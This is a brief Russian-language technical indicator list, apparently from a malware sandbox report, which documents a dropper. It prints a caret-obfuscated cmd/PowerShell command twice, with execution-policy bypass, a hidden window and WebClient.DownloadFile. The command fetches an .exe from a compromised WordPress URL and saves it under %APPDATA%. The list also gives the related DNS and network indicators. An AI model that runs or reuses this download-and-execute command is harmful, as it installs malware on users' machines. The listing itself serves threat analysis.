Техническая информация
- http://swcol-ltda.com/wp-content/uploads/2015/qotot/hhz9.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oW^E^r^sh^eLl^.E^Xe -^eX^ecuTI^on^po^L^ICY ^BY^p^aSs^ -NopR^of^iL^e^ -w^INDows^tYLe HIDD^en (^nEw-^ObJe^c^T ^s^YST^Em.^NET^.^w^EbCliE^nT)^.DoWNL^OADfIle(^'http://swcol-lt...
- %APPDATA%.exe
- 'sw###-ltda.com':80
- http://sw###-ltda.com/wp-content/uploads/2015/QOTOT/hHz9.exe
- DNS ASK sw###-ltda.com
- '<SYSTEM32>\cmd.exe' /C "p^oW^E^r^sh^eLl^.E^Xe -^eX^ecuTI^on^po^L^ICY ^BY^p^aSs^ -NopR^of^iL^e^ -w^INDows^tYLe HIDD^en (^nEw-^ObJe^c^T ^s^YST^Em.^NET^.^w^EbCliE^nT)^.DoWNL^OADfIle(^'http://swcol-lt...' (со скрытым окном)